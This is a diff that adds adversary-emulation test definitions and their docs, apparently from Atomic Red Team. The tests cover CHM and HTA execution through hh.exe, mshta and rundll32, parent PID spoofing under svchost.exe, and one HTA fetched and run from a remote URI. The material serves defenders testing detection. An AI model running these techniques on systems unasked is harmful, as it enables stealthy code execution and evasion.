+          default: its
+        script_engine:
+          description: Default Script Engine
+          type: string
+          default: JScript
+        chm_file_path:
+          description: Default path of CHM
+          type: string
+          default: Test.chm
+      dependencies:
+      - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp
+          must be exported in the module.
+        prereq_command: |-
+          $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+          if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+        get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+          -Force
+
+'
+      executor:
+        command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler
+          #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath
+          #{hh_file_path} -CHMFilePath #{chm_file_path}'
+        name: powershell
+    - name: Invoke CHM Shortcut Command with ITS and Help Topic
+      auto_generated_guid: 15756147-7470-4a83-87fb-bb5662526247
+      description: Executes a CHM file using the Shortcut Command method with a defined
+        ITS Protocol Handler, and help topic extension.
+      supported_platforms:
+      - windows
+      input_arguments:
+        topic_extension:
+          description: Default Help Topic
+          type: string
+          default: html
+        hh_file_path:
+          description: path of modified HH.exe
+          type: path
+          default: "$env:windir\\hh.exe"
+        infotech_storage_handler:
+          description: Default InfoTech Storage Protocol Handler
+          type: string
+          default: its
+        chm_file_path:
+          description: Default path of CHM
+          type: string
+          default: Test.chm
+      dependencies:
+      - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp
+          must be exported in the module.
+        prereq_command: |-
+          $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+          if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+        get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+          -Force
+
+'
+      executor:
+        command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler
+          #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath
+          #{hh_file_path} -CHMFilePath #{chm_file_path}'
+        name: powershell
  T1542.002:
    technique:
      external_references:
@@ -28845,6 +29141,196 @@ defense-evasion:

 '
        name: powershell
+    - name: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral
+        Movement
+      auto_generated_guid: 007e5672-2088-4853-a562-7490ddc19447
+      description: Executes an HTA Application using JScript script engine using local
+        UNC path simulating lateral movement.
+      supported_platforms:
+      - windows
+      input_arguments:
+        script_engine:
+          description: Script Engine to use
+          type: string
+          default: JScript
+        hta_file_path:
+          description: HTA file name and or path to be used
+          type: string
+          default: Test.hta
+        mshta_file_path:
+          description: Location of mshta.exe
+          type: string
+          default: "$env:windir\\system32\\mshta.exe"
+      dependencies:
+      - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication
+          must be exported in the module.
+        prereq_command: |-
+          $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+          if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+        get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+          -Force
+
+'
+      executor:
+        command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine
+          #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath
+          #{mshta_file_path}'
+        name: powershell
+    - name: Invoke HTML Application - Jscript Engine Simulating Double Click
+      auto_generated_guid: 58a193ec-131b-404e-b1ca-b35cf0b18c33
+      description: Executes an HTA Application using JScript script engine simulating
+        double click.
+      supported_platforms:
+      - windows
+      input_arguments:
+        script_engine:
+          description: Script Engine to use
+          type: string
+          default: JScript
+        hta_file_path:
+          description: HTA file name and or path to be used
+          type: string
+          default: Test.hta
+      dependencies:
+      - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication
+          must be exported in the module.
+        prereq_command: |-
+          $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+          if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+        get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+          -Force
+
+'
+      executor:
+        command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine
+          #{script_engine} -SimulateUserDoubleClick'
+        name: powershell
+    - name: Invoke HTML Application - Direct download from URI
+      auto_generated_guid: 39ceed55-f653-48ac-bd19-aceceaf525db
+      description: Executes an HTA Application by directly downloading from remote
+        URI.
+      supported_platforms:
+      - windows
+      input_arguments:
+        mshta_file_path:
+          description: Location of mshta.exe
+          type: string
+          default: "$env:windir\\system32\\mshta.exe"
+        hta_uri:
+          description: URI to HTA
+          type: string
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta
+      dependencies:
+      - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication
+          must be exported in the module.
+        prereq_command: |-
+          $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+          if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+        get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+          -Force
+
+'
+      executor:
+        command: 'Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path}'
+        name: powershell
+    - name: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol
+        Handler
+      auto_generated_guid: e7e3a525-7612-4d68-a5d3-c4649181b8af
+      description: Executes an HTA Application with JScript Engine, Rundll32 and Inline
+        Protocol Handler.
+      supported_platforms:
+      - windows
+      input_arguments:
+        rundll32_file_path:
+          description: Location of rundll32.exe
+          type: string
+          default: "$env:windir\\system32\\rundll32.exe"
+        script_engine:
+          description: Script Engine to use
+          type: string
+          default: JScript
+        protocol_handler:
+          description: Protocol Handler to use
+          type: string
+          default: About
+      dependencies:
+      - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication
+          must be exported in the module.
+        prereq_command: |-
+          $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+          if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+        get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+          -Force
+
+'
+      executor:
+        command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler
+          #{protocol_handler} -UseRundll32 -Rundll32FilePath #{rundll32_file_path}'
+        name: powershell
+    - name: Invoke HTML Application - JScript Engine with Inline Protocol Handler
+      auto_generated_guid: d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840
+      description: Executes an HTA Application with JScript Engine and Inline Protocol
+        Handler.
+      supported_platforms:
+      - windows
+      input_arguments:
+        mshta_file_path:
+          description: Location of mshta.exe
+          type: string
+          default: "$env:windir\\system32\\mshta.exe"
+        script_engine:
+          description: Script Engine to use
+          type: string
+          default: JScript
+        protocol_handler:
+          description: Protocol Handler to use
+          type: string
+          default: About
+      dependencies:
+      - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication
+          must be exported in the module.
+        prereq_command: |-
+          $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+          if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+        get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+          -Force
+
+'
+      executor:
+        command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler
+          #{protocol_handler} -MSHTAFilePath #{mshta_file_path}'
+        name: powershell
+    - name: Invoke HTML Application - Simulate Lateral Movement over UNC Path
+      auto_generated_guid: b8a8bdb2-7eae-490d-8251-d5e0295b2362
+      description: Executes an HTA Application with Simulate lateral movement over
+        UNC Path.
+      supported_platforms:
+      - windows
+      input_arguments:
+        mshta_file_path:
+          description: Location of mshta.exe
+          type: string
+          default: "$env:windir\\system32\\mshta.exe"
+      dependencies:
+      - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication
+          must be exported in the module.
+        prereq_command: |-
+          $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+          if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+        get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+          -Force
+
+'
+      executor:
+        command: 'Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath
+          #{mshta_file_path}'
+        name: powershell
  T1218.007:
    technique:
      created: '2020-01-24T14:38:49.266Z'
@@ -29744,6 +30230,134 @@ defense-evasion:
          Stop-Process -Name "#{dll_process_name}" -ErrorAction Ignore
          Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
        name: powershell
+    - name: Parent PID Spoofing - Spawn from Current Process
+      auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25
+      description: Spawns a powershell.exe process as a child of the current process.
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_path:
+          description: File path or name of process to spawn
+          type: path
+          default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+        parent_pid:
+          description: PID of process to spawn from
+          type: string
+          default: "$PID"
+        command_line:
+          description: Specified command line to use
+          type: string
+          default: "-Command Start-Sleep 10"
+      dependencies:
+      - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
+          must be exported in the module.
+        prereq_command: |-
+          $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+          if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+        get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+          -Force
+
+'
+      executor:
+        command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine
+          ''#{command_line}'' -ParentId #{parent_pid}'
+        name: powershell
+    - name: Parent PID Spoofing - Spawn from Specified Process
+      auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb
+      description: Spawns a notepad.exe process as a child of the current process.
+      supported_platforms:
+      - windows
+      input_arguments:
+        parent_pid:
+          description: PID of process to spawn from
+          type: string
+          default: "$PID"
+        test_guid:
+          description: Defined test GUID
+          type: string
+          default: 12345678-1234-1234-1234-123456789123
+      dependencies:
+      - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
+          must be exported in the module.
+        prereq_command: |-
+          $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+          if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+        get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+          -Force
+
+'
+      executor:
+        command: 'Start-ATHProcessUnderSpecificParent  -ParentId #{parent_pid} -TestGuid
+          #{test_guid}'
+        name: powershell
+    - name: Parent PID Spoofing - Spawn from svchost.exe
+      auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591
+      description: Spawnd a process as a child of the first accessible svchost.exe
+        process.
+      supported_platforms:
+      - windows
+      input_arguments:
+        command_line:
+          description: Specified command line to use
+          type: string
+          default: "-Command Start-Sleep 10"
+        file_path:
+          description: File path or name of process to spawn
+          type: path
+          default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+      dependencies:
+      - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
+          must be exported in the module.
+        prereq_command: |-
+          $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+          if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+        get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+          -Force
+
+'
+      executor:
+        command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine,
+          ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" |
+          Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path}
+          -CommandLine ''#{command_line}'''
+        name: powershell
+    - name: Parent PID Spoofing - Spawn from New Process
+      auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db
+      description: Creates a notepad.exe process and then spawns a powershell.exe
+        process as a child of it.
+      supported_platforms:
+      - windows
+      input_arguments:
+        command_line:
+          description: Specified command line to use
+          type: string
+          default: "-Command Start-Sleep 10"
+        file_path:
+          description: File path or name of process to spawn
+          type: path
+          default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+        parent_name:
+          description: Parent process to spoof from
+          type: path
+          default: "$Env:windir\\System32\\notepad.exe"
+      dependencies:
+      - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
+          must be exported in the module.
+        prereq_command: |-
+          $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+          if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+        get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
+          -Force
+
+'
+      executor:
+        command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent
+          -FilePath #{file_path} -CommandLine ''#{command_line}'''
+        name: powershell
  T1550.002:
    technique:
      external_references:
@@ -10,6 +10,14 @@ Explicitly assigning the PPID may also enable elevated privileges given appropri

 - [Atomic Test #1 - Parent PID Spoofing using PowerShell](#atomic-test-1---parent-pid-spoofing-using-powershell)

+- [Atomic Test #2 - Parent PID Spoofing - Spawn from Current Process](#atomic-test-2---parent-pid-spoofing---spawn-from-current-process)
+
+- [Atomic Test #3 - Parent PID Spoofing - Spawn from Specified Process](#atomic-test-3---parent-pid-spoofing---spawn-from-specified-process)
+
+- [Atomic Test #4 - Parent PID Spoofing - Spawn from svchost.exe](#atomic-test-4---parent-pid-spoofing---spawn-from-svchostexe)
+
+- [Atomic Test #5 - Parent PID Spoofing - Spawn from New Process](#atomic-test-5---parent-pid-spoofing---spawn-from-new-process)
+

 <br/>

@@ -67,4 +75,182 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato



+<br/>
+<br/>
+
+## Atomic Test #2 - Parent PID Spoofing - Spawn from Current Process
+Spawns a powershell.exe process as a child of the current process.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| file_path | File path or name of process to spawn | path | $Env:windir&#92;System32&#92;WindowsPowerShell&#92;v1.0&#92;powershell.exe|
+| parent_pid | PID of process to spawn from | string | $PID|
+| command_line | Specified command line to use | string | -Command Start-Sleep 10|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}' -ParentId #{parent_pid}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} 
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Parent PID Spoofing - Spawn from Specified Process
+Spawns a notepad.exe process as a child of the current process.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| parent_pid | PID of process to spawn from | string | $PID|
+| test_guid | Defined test GUID | string | 12345678-1234-1234-1234-123456789123|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Start-ATHProcessUnderSpecificParent  -ParentId #{parent_pid} -TestGuid #{test_guid}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} 
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Parent PID Spoofing - Spawn from svchost.exe
+Spawnd a process as a child of the first accessible svchost.exe process.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| command_line | Specified command line to use | string | -Command Start-Sleep 10|
+| file_path | File path or name of process to spawn | path | $Env:windir&#92;System32&#92;WindowsPowerShell&#92;v1.0&#92;powershell.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = 'svchost.exe' AND CommandLine LIKE '%'" | Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}'
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} 
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Parent PID Spoofing - Spawn from New Process
+Creates a notepad.exe process and then spawns a powershell.exe process as a child of it.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| command_line | Specified command line to use | string | -Command Start-Sleep 10|
+| file_path | File path or name of process to spawn | path | $Env:windir&#92;System32&#92;WindowsPowerShell&#92;v1.0&#92;powershell.exe|
+| parent_name | Parent process to spoof from | path | $Env:windir&#92;System32&#92;notepad.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}'
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} 
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
 <br/>
@@ -51,3 +51,114 @@ atomic_tests:
      Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
    name: powershell

+- name: Parent PID Spoofing - Spawn from Current Process
+  auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25
+  description: Spawns a powershell.exe process as a child of the current process.
+  supported_platforms:
+  - windows
+  input_arguments:
+    file_path:
+      description: File path or name of process to spawn
+      type: path
+      default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe
+    parent_pid:
+      description: PID of process to spawn from
+      type: string
+      default: $PID
+    command_line:
+      description: Specified command line to use
+      type: string
+      default: -Command Start-Sleep 10
+  dependencies:
+  - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+    prereq_command: |-
+      $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+      if (-not $RequiredModule) {exit 1}
+      if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+    get_prereq_command: |
+      Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+  executor:
+    command: "Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}' -ParentId #{parent_pid}"
+    name: powershell
+
+- name: Parent PID Spoofing - Spawn from Specified Process
+  auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb
+  description: Spawns a notepad.exe process as a child of the current process.
+  supported_platforms:
+  - windows
+  input_arguments:
+    parent_pid:
+      description: PID of process to spawn from
+      type: string
+      default: $PID
+    test_guid:
+      description: Defined test GUID
+      type: string
+      default: 12345678-1234-1234-1234-123456789123
+  dependencies:
+  - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+    prereq_command: |-
+      $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+      if (-not $RequiredModule) {exit 1}
+      if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+    get_prereq_command: |
+      Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+  executor:
+    command: 'Start-ATHProcessUnderSpecificParent  -ParentId #{parent_pid} -TestGuid #{test_guid}'
+    name: powershell
+
+- name: Parent PID Spoofing - Spawn from svchost.exe
+  auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591
+  description: Spawnd a process as a child of the first accessible svchost.exe process.
+  supported_platforms:
+  - windows
+  input_arguments:
+    command_line:
+      description: Specified command line to use
+      type: string
+      default: -Command Start-Sleep 10
+    file_path:
+      description: File path or name of process to spawn
+      type: path
+      default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe
+  dependencies:
+  - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+    prereq_command: |-
+      $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+      if (-not $RequiredModule) {exit 1}
+      if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+    get_prereq_command: |
+      Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+  executor:
+    command: "Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter \"Name = 'svchost.exe' AND CommandLine LIKE '%'\" | Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}'"
+    name: powershell
+
+- name: Parent PID Spoofing - Spawn from New Process
+  auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db
+  description: Creates a notepad.exe process and then spawns a powershell.exe process as a child of it.
+  supported_platforms:
+  - windows
+  input_arguments:
+    command_line:
+      description: Specified command line to use
+      type: string
+      default: -Command Start-Sleep 10
+    file_path:
+      description: File path or name of process to spawn
+      type: path
+      default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe
+    parent_name:
+      description: Parent process to spoof from
+      type: path
+      default: $Env:windir\System32\notepad.exe
+  dependencies:
+  - description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
+    prereq_command: |-
+      $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+      if (-not $RequiredModule) {exit 1}
+      if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+    get_prereq_command: |
+      Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+  executor:
+    command: "Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{command_line}'"
+    name: powershell
@@ -10,6 +10,16 @@ A custom CHM file containing embedded payloads could be delivered to a victim th

 - [Atomic Test #2 - Compiled HTML Help Remote Payload](#atomic-test-2---compiled-html-help-remote-payload)

+- [Atomic Test #3 - Invoke CHM with default Shortcut Command Execution](#atomic-test-3---invoke-chm-with-default-shortcut-command-execution)
+
+- [Atomic Test #4 - Invoke CHM with InfoTech Storage Protocol Handler](#atomic-test-4---invoke-chm-with-infotech-storage-protocol-handler)
+
+- [Atomic Test #5 - Invoke CHM Simulate Double click](#atomic-test-5---invoke-chm-simulate-double-click)
+
+- [Atomic Test #6 - Invoke CHM with Script Engine and Help Topic](#atomic-test-6---invoke-chm-with-script-engine-and-help-topic)
+
+- [Atomic Test #7 - Invoke CHM Shortcut Command with ITS and Help Topic](#atomic-test-7---invoke-chm-shortcut-command-with-its-and-help-topic)
+

 <br/>

@@ -83,4 +93,229 @@ hh.exe #{remote_chm_file}



+<br/>
+<br/>
+
+## Atomic Test #3 - Invoke CHM with default Shortcut Command Execution
+Executes a CHM file with the default Shortcut Command method.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| chm_file_path | Default path of CHM | string | Test.chm|
+| hh_file_path | path of modified HH.exe | path | $env:windir&#92;hh.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} 
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Invoke CHM with InfoTech Storage Protocol Handler
+Executes a CHM file with the ITS protocol handler.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| hh_file_path | path of modified HH.exe | path | $env:windir&#92;hh.exe|
+| infotech_storage_handler | Default InfoTech Storage Protocol Handler | string | its|
+| chm_file_path | Default path of CHM | string | Test.chm|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} 
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Invoke CHM Simulate Double click
+Executes a CHM file simulating a user double click.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| chm_file_path | Default path of CHM | string | Test.chm|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} 
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - Invoke CHM with Script Engine and Help Topic
+Executes a CHM file with a defined script engine, ITS Protocol Handler, and help topic extension.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| topic_extension | Default Help Topic | string | html|
+| hh_file_path | path of modified HH.exe | path | $env:windir&#92;hh.exe|
+| infotech_storage_handler | Default InfoTech Storage Protocol Handler | string | its|
+| script_engine | Default Script Engine | string | JScript|
+| chm_file_path | Default path of CHM | string | Test.chm|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}
+```
+
+
+
+
